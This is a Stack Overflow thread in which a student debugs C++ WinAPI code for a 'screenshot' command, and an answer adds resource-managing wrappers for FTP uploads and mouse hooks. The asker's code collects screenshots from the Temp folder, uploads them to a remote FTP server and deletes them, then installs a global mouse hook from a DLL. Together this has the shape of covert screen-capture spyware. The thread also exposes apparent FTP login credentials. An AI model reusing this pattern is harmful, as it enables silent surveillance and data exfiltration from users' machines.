# Delete and upload all .bmp files in folder and load DLL Library

Tags: c++, winapi, file-upload, delete-file

I have a problem.
My goal is a create command "screenshot", which check if is on Temp folder any .bmp file, then all .bmp files upload to FTP server and delete it. And then load Dll library. But my code doesn't delete and upload to FTP server (credentials to ftp login is CORRECT!) Let me show you my code.

```
else if (command == "screenshot")
{
    char *user = "uzivatel";
    char *pass = "nenenetotinedam";
    char *ftpserver = "server.neserver.cz";
    std::string strTempPath;
    char wchPath[MAX_PATH];
    if (GetTempPathA(MAX_PATH, wchPath))
        strTempPath = wchPath;
    HOOKPROC hhDLL;
    for (const auto& p : fs::directory_iterator(strTempPath))
    {
        if (p.path().extension() == ".bmp")
        {
            std::string nameone = p.path().string();
            LPCSTR name = nameone.c_str();
            std::string notFullPath = "/kstest.8u.cz/web/";
            LPCSTR path = notFullPath.c_str();
            std::string newPath = notFullPath + name;
            LPCSTR fullPath = newPath.c_str();
            HINTERNET hInternet;
            HINTERNET hFtpSession;
            hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
            hFtpSession = InternetConnect(hInternet, ftpserver, INTERNET_DEFAULT_FTP_PORT, user, pass, INTERNET_SERVICE_FTP, 0, 0);
            FtpPutFile(hFtpSession, name, fullPath, FTP_TRANSFER_TYPE_BINARY, 0);
            if (FtpPutFile(hFtpSession, name, fullPath, FTP_TRANSFER_TYPE_BINARY, 0) == TRUE)
            {
                std::cout << "File Sent! " << std::endl;
                Sleep(1000);
                InternetCloseHandle(hFtpSession);
                InternetCloseHandle(hInternet);
                remove(name);
            }
            else
            {
                std::cout << "File didn't send " << std::endl;
            }
        }
        HHOOK _hook;
        HINSTANCE hDLL = LoadLibrary("D:\\Dll3.dll");
        __declspec(dllexport) LRESULT __cdecl HookCallback(int nCode, WPARAM wParam, LPARAM lParam);
        __declspec(dllexport) void __cdecl TakeScreenShot(const char* filename);
        hhDLL = (HOOKPROC)GetProcAddress((hDLL), "HookCallback");
        _hook = SetWindowsHookEx(WH_MOUSE_LL, hhDLL, hDLL, 0);
    }
}
```

If you will help me, I will be glad. :)
Btw. Sorry for my amateur english. I'm just a student from Czechia.

Comment: Start by checking the return values of all those function calls. If one fails, use GetLastError() to find out why.

Comment: Please provide a [Minimal, Complete, and Verifiable example](https://stackoverflow.com/help/mcve) - but don't supply real login credentials (I hope those aren't real?). One thing: When sending binary files, like `.bmp` files, use `FTP_TRANSFER_TYPE_BINARY`, not ASCII.

Answer (score 1, accepted):

It's impossible to say where the you have problems but it looks like you are doing too many things at the same time. You don't check for return values and you don't free resources so I've made a console example of how you could handle the HINTERNET resources and check for errors by using exceptions.

```
#include "pch.h" // if you use precompiled headers
#include <iostream>
#include <vector>
#include <string>

#include <Windows.h>
#include <wininet.h>

// A simple wide string exception class.
class werror {
    std::wstring text;
public:
    werror(const wchar_t* Text) : text(Text) {}
    werror(const std::wstring& Text) : text(Text) {}
    const wchar_t* what() const { return text.c_str(); }
};

// base class for HINTERNET resources that will free the resource
// when destroyed
class IBase {
    HINTERNET hInternet;
public:
    IBase(HINTERNET h) : hInternet(h) {
        if (!hInternet) // invalid handle, throw an exception
            throw werror(L"Internet error " + std::to_wstring(GetLastError()));
    }
    // no copying or moving
    IBase(const IBase&) = delete;
    IBase(IBase&&) = delete;
    IBase& operator=(const IBase&) = delete;
    IBase& operator=(IBase&&) = delete;
    // free the resource when being destroyed
    virtual ~IBase() { InternetCloseHandle(hInternet); }

    // conversion to HINTERNET for functions that need it    
    operator HINTERNET () const {
        return hInternet;
    }
};

// class for an FTP session
class FtpSession : public IBase {
public:
    FtpSession(HINTERNET h) : IBase(h) {}

    void PutFile(const std::wstring& LocalFile, const std::wstring& NewRemoteFile) {
        auto rv = FtpPutFile(
            *this, LocalFile.c_str(), NewRemoteFile.c_str(), FTP_TRANSFER_TYPE_BINARY, 0
        );
        if (!rv) // FtpPutFile failed, throw an exception
            throw werror(L"PutFile error " + std::to_wstring(GetLastError()));
    }
};

// a class factory to create Ftp (and future) objects
class Internet : public IBase {
public:
    Internet(const std::wstring& Agent, DWORD dwAccessType, const std::wstring& Proxy,
        const std::wstring& ProxyBypass, DWORD dwFlags) :
        IBase(
            InternetOpen(
                Agent.c_str(),
                dwAccessType,
                Proxy.size() ? Proxy.c_str() : nullptr,
                ProxyBypass.size() ? ProxyBypass.c_str() : nullptr,
                dwFlags
            )
        )
    {}

    // factory method for creating an Ftp object
    FtpSession GetFtpSession(const std::wstring& server,
        const std::wstring& user, const std::wstring& pass)
    {
        return FtpSession(
            InternetConnect(
                *this, server.c_str(), INTERNET_DEFAULT_FTP_PORT,
                user.c_str(), pass.c_str(), INTERNET_SERVICE_FTP, 0, 0
            )
        );
    }
};

// Example: This program will transfer all the files you give on the commandline
//          to your FTP server
int wmain(int argc, wchar_t* argv[])
{
    std::vector<std::wstring> args(argv + 1, argv + argc);
    try {
        // "inet" can be used for as long as the program is running to create Ftp
        // (and future internet) objects. It's "expensive" to create this object
        // so keep it until you are sure you don't need it.

        Internet inet(L"user-agent-name", INTERNET_OPEN_TYPE_DIRECT, L"", L"", 0);

        for (const auto& file : args) {
            // we create one Ftp session per file (probably not needed)
            FtpSession ftp = inet.GetFtpSession(L"klokanek.endora.cz", L"oxytram8ucz", L"a1jfGIP69. ");

            std::wcout << L"Transferring " << file << L"\n";
            ftp.PutFile(file, file);
            std::wcout << L"Done with " << file << L"\n";
        }
    }
    catch (const werror& ex) {
        std::wcerr << L"Exception: " << ex.what() << L"\n";
    }
}
```

Managing the lifetime of your other resources is also an issue so I've made a `HHOOK` example below. With this class, you can declare a `HookMgr` variable (like `HookMgr my_mouse_hook;`) in your main Form or whatever you have that will live for the lifetime of the program and then be automatically destroyed.

```
class HookMgr {
    HHOOK m_hook;
public:
    HookMgr(HHOOK hook = nullptr) : m_hook(hook) {
        if(m_hook==nullptr) throw werror(L"Invalid hook");
    }
    HookMgr(const HookMgr&) = delete;
    HookMgr(HookMgr&& o) : m_hook(o.m_hook) { o.m_hook = nullptr; }
    HookMgr& operator=(const HookMgr&) = delete;
    HookMgr& operator=(HookMgr&& o) {
        if (m_hook) UnhookWindowsHookEx(m_hook);
        m_hook = o.m_hook;
        o.m_hook = nullptr;
        return *this;
    }
    HookMgr& operator=(HHOOK hook) {
        if(hook==nullptr) throw werror(L"Invalid hook");
        if (m_hook) UnhookWindowsHookEx(m_hook);
        m_hook = hook;
        return *this;
    }
    ~HookMgr() {
        if (m_hook) UnhookWindowsHookEx(m_hook);
    }
};
```

When you want to install the hook, just do

```
my_mouse_hook = SetWindowsHookEx(WH_MOUSE_LL, hhDLL, hDLL, 0);
```

and then forget about it. When the program dies and the `HookMgr` is destroyed, it will automatically release the installed hook. You can do similar things for loading/unloading DLL:s.

Comment: Bro good try, but I need this at functionality of command "screenshot".. Sorry

Comment: Yeah, instantiate one `Internet` object when your program starts and keep that instance for the rest of the program run. In your screenshot routine, do `Ftp ftpSession = inet.GetFtpSession(L"klokanek.endora.cz", L"oxytram8ucz", L"a1jfGIP69. "); ` and do the transfer like in the example above. It works fine for me.

Comment: I just renamed the `Ftp` class `FtpSession` since I didn't like the old name, but there's no real change to how it works.

Comment: Okay, and why doesn't delete that files then and why doesn't load dll library? Screenshots from Debugger: https://ctrlv.cz/UixV and https://ctrlv.cz/6zhQ

Comment: Those are separate issues and you don't check the return value of `std::remove` in your code which you should. In Windows you can't remove files opened by another process for example. You don't check the return value when loading the DLL or getting the proc address either. Do that and then check `GetLatestError()` whenever you get a return value indicating an error to see what's going on.

Comment: ... and just as I managed the internet resources in my example to not leak resources you should care for the hook resources. The `_hook` resource needs to be freed with `UnhookWindowsHookEx` but now it leaks when it goes out of scope. The `hDLL` resource needs to be freed with `FreeLibrary` but is leaked at the same place.

Comment: That's not going to work well. If your program calls `std::exit()` for some reason, how would that be called?

Comment: ... and how would it know which hook to release?

Comment: Okay, but I have most important problem with value of variable 'p' - value is: {_Mypval={_Mystr=L"C:\\Users\\MARTIN\\AppData\\Local\\Temp\\4r0jdpzk.ci1" } _Mystat={_Myftype=regular (1) ...} ...} - I was updated my code. Can you help me? Thanks for your patience. I'm beginner in C++ programming. And where I need to UnHookWindowsEx? And why?

Comment: You are welcome :) `strTempPath` is a `std::string` but you are on Windows so `<filesystem>` paths are based on `wchar_t` chars and therefor you should  use `std::wstring`s. Every resource that you aquire (e.g. with `SetWindowsHookEx`) you need to release (e.g with `UnHookWindowsEx`) or else your program will "leak" that resource. For how long do you want the hook to be active? Why is it installed where it is? I see the updated code, but you still don't check return values from the functions you call.

Comment: Hey, I want active the hook after the command "screenshot" and then active forever.

Comment: Even after your program dies? Windows has gotten better at cleaning up allocated resources after programs that forgets to release them - but don't rely on it.

Comment: I added a `HHOOK` manager to the answer to show you what I mean.

Comment: How? You don't save the `HHOOK` handle.

Comment: Yes, idea is good. And Hook installer I will give under row number 2 in your HookMgr sample?

Comment: I asked how you uninstall the hook since you don't save the `HHOOK` handle and I don't understand the answer "_Yes, idea is good_". Perhaps we should focus on one thing at a time: Were you able to use the `FtpSession` class to transfer files?

Comment: Hey, I want uninstall Hook when program dies.. But I don't have idea how to do it.. And I still using my code (it's in my post) because it's good for me because I have in my program more commands.

Comment: Your code **will** leak resources. The `Internet`, `FtpSession` and `HookMgr` classes I showed have a better chance of cleaning up when your program dies. You should try to understand what they do. The comments in the first classes should help.

Comment: Okay, without your solution, I have solved uploading and deleting file. One problem is with loading dll library. hhDLL and _hook is NULL (pointer in debugger shows)

Comment: Well, acquiring rhe resources to be able to do the FTP transfer is trivial. What the code I wrote does is to manage those resourses so they are released properly.